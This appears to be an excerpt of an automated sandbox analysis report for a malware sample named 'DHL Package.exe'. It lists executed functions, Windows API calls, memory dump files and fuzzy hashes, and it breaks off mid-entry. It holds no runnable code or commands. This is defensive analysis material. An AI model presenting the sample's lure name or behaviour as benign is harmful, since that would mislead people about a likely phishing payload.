GlobalAlloc.KERNEL32(00000040,?), ref: 6CA7116A
GlobalFree.KERNEL32(00000000), ref: 6CA711C7
GlobalFree.KERNEL32(00000000), ref: 6CA711D9
GlobalFree.KERNEL32(?), ref: 6CA71203

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 0f30d68671f232ef4e0574f71acfebff644934e78f8b83cd4f61e6478610fe5f
Instruction ID: 36afac928cd0a871069db0453d9cadde56ad89c26c6a99e572a05282590134ab
Opcode Fuzzy Hash: 0f30d68671f232ef4e0574f71acfebff644934e78f8b83cd4f61e6478610fe5f
Instruction Fuzzy Hash: FD31E6BE6013129FDB258F68C96993577F8FB06314714452DEA49DBA10E734D88787B0

Function 00405E36 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9

Analysis Process: DHL Package.exePID: 4252, Parent PID: 9072COMMON

Executed Functions

Function 39383410 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 393867F0

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 0f0042e4018f4b474191dd8251a34390fb56a9280db3d9894ea472268f717023
Instruction ID: 49bbba97aafc8352c1b0e9a0658720fb080e8dc15fd49ac859404712d6c43250
Opcode Fuzzy Hash: 0f0042e4018f4b474191dd8251a34390fb56a9280db3d9894ea472268f717023
Instruction Fuzzy Hash: 9573F471C1475A8EDB11EFA8C844A99F7B1FF99304F51C6DAE05867221EB70AAC4CF81

Function 39AC0040 Relevance: 4.1, Strings: 2, Instructions: 1587COMMON

Download Yara Rule

Strings

;<(:^, xrefs: 39AC18B0, 39AC18B5, 39AC1C29, 39AC1C2E
poq, xrefs: 39AC14CD

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID: poq$;<(:^
API String ID: 0-1050436853
Opcode ID: 77d6534e7c76f8c76f29be961b44bdc5881899ea677b9fac58d7c9636b87cf0b
Instruction ID: 882f1045d6d2f9dea9eb55599a52dd6ce89cfc15e43683d5ff065958837d5da8
Opcode Fuzzy Hash: 77d6534e7c76f8c76f29be961b44bdc5881899ea677b9fac58d7c9636b87cf0b
Instruction Fuzzy Hash: F8E20B38945215DFDB25DF24D840A9AFBF5FF89302F1482ADD819AB361CB349A91CF84

Function 001537E5 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

Plq, xrefs: 001538F0
wtq, xrefs: 00153860

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: Plq$wtq
API String ID: 0-481506135
Opcode ID: 1c928a5f81b678c6d86948cafb5c258d2aa25114a00d89599de6ce162f706920
Instruction ID: a4454e3dcf206207af0104f70d914d72a3877a9b6445e1d9549d44c2b6d33a37
Opcode Fuzzy Hash: 1c928a5f81b678c6d86948cafb5c258d2aa25114a00d89599de6ce162f706920
Instruction Fuzzy Hash: B7C1C0B1D09389CFCB06DFA4C4904ADBBB1EF56396B14449AD860EF2A2D7344D0ECB65

Function 00156320 Relevance: 1.8, Strings: 1, Instructions: 517COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 00156737, 00156789, 001567EB, 00156889, 001568EB

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: 9476a9364d3a71a30f1daea08bb284ae954155e750b069c97e32bb9920f3e96b
Instruction ID: 4a6afd7fc4c95b033b2f9f608fe3a910d6fe7a0d4410846a43b1fce942367e82
Opcode Fuzzy Hash: 9476a9364d3a71a30f1daea08bb284ae954155e750b069c97e32bb9920f3e96b
Instruction Fuzzy Hash: 0D129E70A002158FDB14CF68C854AAEBBF6BFC9301F658169E855EB391EF349D45CB90

Function 39387930 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

(ksU^, xrefs: 39387874, 393878BB

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID: (ksU^
API String ID: 0-2795648864
Opcode ID: 61e291e999aef0fe2b455838ebfa155817b3ff02535c0f2298c95838ac4a808e
Instruction ID: 3c724fd262b3bb8254a376532108fb5bc84d79c1129b6352c702099d350439bb
Opcode Fuzzy Hash: 61e291e999aef0fe2b455838ebfa155817b3ff02535c0f2298c95838ac4a808e
Instruction Fuzzy Hash: D7F1C5B4E01228CFEB14DFA9C884B9DFBB2BF88304F5481A9D409AB355DB749985CF51

Function 393A38B8 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86efebfe3440357e362425c37e91e308a187f950d7f09ffc270a5cfe2008ceb
Instruction ID: 179e61139ffb36f18ef420c2892edeeca4b5f6bec3b10e686c09a3342b679c24
Opcode Fuzzy Hash: c86efebfe3440357e362425c37e91e308a187f950d7f09ffc270a5cfe2008ceb
Instruction Fuzzy Hash: FB826D74A012289FEBA4DF65CD95BDDBBB2BF89300F1081E9D809A7261DB345E81CF45

Function 0015EE21 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2cf35e7058f708d47f8fde7c15d3b454241a8c16ae2cc17d01fa367af3c81d0
Instruction ID: def06717b0e820af1a182918240e86ba6c7597bfc8e4511f229fab9c63d9c5e3
Opcode Fuzzy Hash: e2cf35e7058f708d47f8fde7c15d3b454241a8c16ae2cc17d01fa367af3c81d0
Instruction Fuzzy Hash: 6D72B174E01228CFEB64DF65C980BDDBBB2BB89305F5481E9D819AB251D7349E86CF40

Function 00156948 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd47e4751d6d346901606181410ca68b64c30f9dc1efb4b72141c0fd88ccd034
Instruction ID: 6ec9d4fd292af68666a672fbb6fcd686d0a7a18a46ccba834330e38c5bce1a11
Opcode Fuzzy Hash: cd47e4751d6d346901606181410ca68b64c30f9dc1efb4b72141c0fd88ccd034
Instruction Fuzzy Hash: FF025E35A00209DFDB14CFA8C844AAEBBB2FF89341F958469E865AB261D734DC45CF90

Function 0015B138 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c028a46fda0894e0262a4acd0725cf62763a4771f1058fff5281eb4768c3e6
Instruction ID: 3683b53e8558054d985b8a59f21518142991c55846023c0dee8d2bd7da041a3e
Opcode Fuzzy Hash: b0c028a46fda0894e0262a4acd0725cf62763a4771f1058fff5281eb4768c3e6
Instruction Fuzzy Hash: B2E1FA75E04618CFDB14CFA9C884A9DBBF1BF89311F158069E819AB362DB30AC45CF51

Function 393AAD08 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeeee74b12b4e32acbaf7a31a5a98f7e1efde701f9402a5329c3cfdebd96fc61
Instruction ID: ed2a06bfc52de32714ca7a81f23bb651a8be09d825e0bc0f4ccc7cea64b3f8da
Opcode Fuzzy Hash: aeeee74b12b4e32acbaf7a31a5a98f7e1efde701f9402a5329c3cfdebd96fc61
Instruction Fuzzy Hash: B6E1C5B4E01218CFEB54DFA5C894B9DBBB2BF89304F1081AAD408B7395DB355A85CF54

Function 39380D60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7226e20866efdafc2373e8d94c7536c52c4e5d7ca61a1fb6240732fb2d9f4f8b
Instruction ID: 5f0770ef8cdd6476e0c1d85e352166a78080c2a5c8bb43f702a7a6fae865cd80
Opcode Fuzzy Hash: 7226e20866efdafc2373e8d94c7536c52c4e5d7ca61a1fb6240732fb2d9f4f8b
Instruction Fuzzy Hash: 8AC1A2B4E01218CFDB54DFA5C994B9DBBB2FF89301F2081AAD809A7365DB345A85CF50

Function 393811C0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 983d15c0f070559af58c40baee38e97496e30d99873abec965b9b25fd98dd04d
Instruction ID: 2dc30c6e9a01fe58cd512a1e850a05b5566053d37c9e72741a8fe6b44be51b4e
Opcode Fuzzy Hash: 983d15c0f070559af58c40baee38e97496e30d99873abec965b9b25fd98dd04d
Instruction Fuzzy Hash: 93A107B4D00208CFEB14DFA5C984BDDBBB1FF89314F20826AE419A7291DB749A85CF55

Function 393AB910 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d26e3e186a670f0d5f4c3c203a6c232a92ce35fee3817bcb59e79b71bdf1658
Instruction ID: 06c7dc4ae07877385e47e7d0471c4c96cb6cd31ae59434df1a4ea454bae88f48
Opcode Fuzzy Hash: 7d26e3e186a670f0d5f4c3c203a6c232a92ce35fee3817bcb59e79b71bdf1658
Instruction Fuzzy Hash: 85A191B5E01228CFEB58CF6AC944B9DBBF2BF89300F14C1AAD409A7255DB345A85CF51

Function 393AEB78 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358fd3f91e0f1b008fe07da2f2a4a585cb163eed73f9594314c1357e91ae9137
Instruction ID: 7d71016760cdab8d9e000fea5365fa0cbcace22c1bc0cdb816be162cae1b9e9a
Opcode Fuzzy Hash: 358fd3f91e0f1b008fe07da2f2a4a585cb163eed73f9594314c1357e91ae9137
Instruction Fuzzy Hash: 23A193B5E012288FEB24CF6AC944B9DBBF2BF89300F14C1AAD409A7255DB345A85CF51

Function 393AD240 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9595b8a75248031861b56613b3279eddbb5aae0afbd0d382d93fa19fb8042bb2
Instruction ID: 25ca303c746fad7d98a193cc1672c82814b644ac04d15f6f24dbc099a3e172d0
Opcode Fuzzy Hash: 9595b8a75248031861b56613b3279eddbb5aae0afbd0d382d93fa19fb8042bb2
Instruction Fuzzy Hash: 7EA182B5E012288FEB18CF6AC944B9DBBF2BF89300F14C1AAD40DA7255DB745A85CF51

Function 393AD890 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c567e459776193e4e5b633e5e4566e282498b877fc35077fe12d218378de9d
Instruction ID: 36d5753a699fc5efa32e3385e1dd0916602c3b1f1189483fa3c821589d9ea5d1
Opcode Fuzzy Hash: 27c567e459776193e4e5b633e5e4566e282498b877fc35077fe12d218378de9d
Instruction Fuzzy Hash: EFA1A1B5E052288FEB18CF6AC944B9DBBF2BF89300F14C1AAD40CA7255DB745A85CF51

Function 393ACBF0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e3527e78ccd5010cd8c96efd305e043767618120050a1504e64cf23ed4dc234
Instruction ID: aea5e0bfa40aa840557f138304e9231ea335d49a64280148b8fa6d5acddd7233
Opcode Fuzzy Hash: 5e3527e78ccd5010cd8c96efd305e043767618120050a1504e64cf23ed4dc234
Instruction Fuzzy Hash: C9A18FB5E012288FEB58CF6AC944B9DBBF2BF89300F14C1AAD40CA7255DB745A85CF51

Function 393ADEE0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e4771b5e9bc4381b4fbcb6e0bb74ad021702b4f747edbce6bb36f267134377
Instruction ID: 185736b1d9e724e47adb77802d5c02843bd83d82603ce4d2fa5822d37f10616d
Opcode Fuzzy Hash: d6e4771b5e9bc4381b4fbcb6e0bb74ad021702b4f747edbce6bb36f267134377
Instruction Fuzzy Hash: F0A194B5E012288FEB64CF6AD944B9DBBF2BF89300F14C1AAD40CA7255DB345A85CF51

Function 001548B7 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7a26d452b161467cdd04382b48dbb9b7d02567cd7d4902547dabfe1443a16b
Instruction ID: 37da839f63c8e2a00221a790aed06975adbce6a498ebf4a01ae4b57da5f1e361
Opcode Fuzzy Hash: bf7a26d452b161467cdd04382b48dbb9b7d02567cd7d4902547dabfe1443a16b
Instruction Fuzzy Hash: 9B911874D01208CFEB58DFA9C884B9DBBF2BF89305F158069E819AB361DB345985CF54

Function 393AE530 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3514abe01e07b241f77686b859d433dbf7a57cad0d54c9d40f74483b8aaf61
Instruction ID: ed42c0354c2300639b67d3b227e4ea3c5712a4411b5a98cc33726d0195ffc8b4
Opcode Fuzzy Hash: 3c3514abe01e07b241f77686b859d433dbf7a57cad0d54c9d40f74483b8aaf61
Instruction Fuzzy Hash: 6BA184B5E012288FEB24CF6AC944B9DBBF2BF89300F54C1AAD409A7255DB345A85CF51

Function 393ABF60 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c39153f62694b7498abcbfa6ceeb74f78a77b12640d643f47629db3c7cc522b
Instruction ID: b536cb1fa4ca069d09d9ffc417973ab1cb8bc97718e22e50aae0e7dfd96c2347
Opcode Fuzzy Hash: 0c39153f62694b7498abcbfa6ceeb74f78a77b12640d643f47629db3c7cc522b
Instruction Fuzzy Hash: 68A181B5E012288FEB58CF6AC944B9DBBF2BF89300F14C1AAD408B7255DB345A85CF51

Function 393AC5A8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407c7e3cf920f5be10be74da55ec6bdb0f22a087dd49f81e6c17c7f1e051595a
Instruction ID: 53694d52e30120776b42b7917fdd796a3af86628fdd2b91811aa21668451f629
Opcode Fuzzy Hash: 407c7e3cf920f5be10be74da55ec6bdb0f22a087dd49f81e6c17c7f1e051595a
Instruction Fuzzy Hash: 0BA190B5E012288FEB58CF6AC944B9DBBF2BF89300F14C1AAD408B7255DB345A85CF51

Function 39381506 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc862685b3e35ecf55853874eaf471c908039f226e98ef89b4812461fa365f3
Instruction ID: 938c9db91a4ecc6967fec52830981f0609b2abf315461c49982defaa3e2c6679
Opcode Fuzzy Hash: 8bc862685b3e35ecf55853874eaf471c908039f226e98ef89b4812461fa365f3
Instruction Fuzzy Hash: 249106B4D04208CFEB10DFA4C884BDDBBB1FF89314F20826AE419A7291DB749985CF55

Function 0015C160 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195f3fb220e4d08f3e1e891472fb732f919959f0b4623368e3c45159733faa7e
Instruction ID: 0f65f24f1e33b484978dfaff22cc08a6e8465c4dad73739a91d408f93021ca0e
Opcode Fuzzy Hash: 195f3fb220e4d08f3e1e891472fb732f919959f0b4623368e3c45159733faa7e
Instruction Fuzzy Hash: 4681B374E00218CFEB58DFA9D884A9DBBF2BF89301F14D069E819AB365DB349945CF50

Function 0015C441 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03dd7268d53e3d8c815437d1a5e350dc73c864a4ae014b96529e2c7c3b93ed0
Instruction ID: 2fe2410fff23f9fed1ebe5eca208f085b4ba41bf7ca3929915861b7b9e5fd69a
Opcode Fuzzy Hash: b03dd7268d53e3d8c815437d1a5e350dc73c864a4ae014b96529e2c7c3b93ed0
Instruction Fuzzy Hash: EA81C674E00218CFEB18DFA9C894A9DFBF2BF89301F249069E819AB365DB345945CF51

Function 0015BBA1 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef787a70751b1a696c5bbb05e9aa7271772ae650b60a1cc10438b3805c209c7d
Instruction ID: ab6136150a24e12f02bd8db10602b65a6046d71a33809ee03b2acc9ce6da4814
Opcode Fuzzy Hash: ef787a70751b1a696c5bbb05e9aa7271772ae650b60a1cc10438b3805c209c7d
Instruction Fuzzy Hash: DC81D574E04208CFEB58DFA9C884A9DFBF2BF89305F148069E819AB365DB349945CF54

Function 0015B8C1 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12007d09f58463d6381730f8e76c645b8d1f05a73e9dbe0914f5baa4e7210524
Instruction ID: f7dfc01f882ccf2581fa12a087acad8a28587ac17770cdf22b6163435ae86e62
Opcode Fuzzy Hash: 12007d09f58463d6381730f8e76c645b8d1f05a73e9dbe0914f5baa4e7210524
Instruction Fuzzy Hash: EA81C474E05218CFEB18DFA9C884A9DFBF2BF89301F148069E819AB365DB345945CF50

Function 0015BE81 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10438a4dff58447d306820040ccc644f5867806f5f2d617c653de6dfcb8dbce5
Instruction ID: ab8ee1f57da25fe3151137f0f665685631e72ca0dc8dbe3950848e3413ad69c4
Opcode Fuzzy Hash: 10438a4dff58447d306820040ccc644f5867806f5f2d617c653de6dfcb8dbce5
Instruction Fuzzy Hash: F581A474E00218CFEB58DFA9C884A9DFBF2BF89301F148069E819AB365DB345985CF51

Function 0015B5E0 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455bfe16cfa76e77ab39dfd46a1bab6a7ec0489ea525d300d6bae436aadf8277
Instruction ID: 5c8ae25dbc2681b91519cfb8a208e26fa86881e3095034f82358bee7e8629ce6
Opcode Fuzzy Hash: 455bfe16cfa76e77ab39dfd46a1bab6a7ec0489ea525d300d6bae436aadf8277
Instruction Fuzzy Hash: 7381B574E05218CFEB58DFA9C884A9DFBF2BF89301F248069E819AB365DB345945CF50

Function 3938B0B8 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fab79e063c9a6cfc5639772ab373bc46f64790bf85dfd20b67591044bacc557
Instruction ID: 37fe5157602e4b68b2fb9327d406906f814bf37a7fa85c20becfec8ef67ffe6c
Opcode Fuzzy Hash: 1fab79e063c9a6cfc5639772ab373bc46f64790bf85dfd20b67591044bacc557
Instruction Fuzzy Hash: 2681D0B4E00219CFEB14DFAAD89479EBBB2BF89300F20816AD419BB394DB345945CF40

Function 393ABF50 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2c75292c678b82f23af380e0aa278eec3373f087c28ae544e84e48403ed22a
Instruction ID: 813f03eccd21699fe6c3beebdbcafd7085ef8500cd1bd4cc4e07c24b11fe87ce
Opcode Fuzzy Hash: ff2c75292c678b82f23af380e0aa278eec3373f087c28ae544e84e48403ed22a
Instruction Fuzzy Hash: 127185B5E01618CFEB58CF6AC94479DBBF2AF89300F14C0AAD40CA7255DB345A85CF51

Function 393AC598 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71a2b02eb175650108ed9caaafe6e850e38248e1ae2aeb6455c5dd448b91110
Instruction ID: f0649d5d34afc6f28cb2e942fcd971b58440312a97f932f81ea724dbdbbddbe3
Opcode Fuzzy Hash: d71a2b02eb175650108ed9caaafe6e850e38248e1ae2aeb6455c5dd448b91110
Instruction Fuzzy Hash: DD7173B5E016288FEB58CF6AC944B99BBF2BF89300F14C1AAD40DA7254DB345A85CF51

Function 393AE520 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

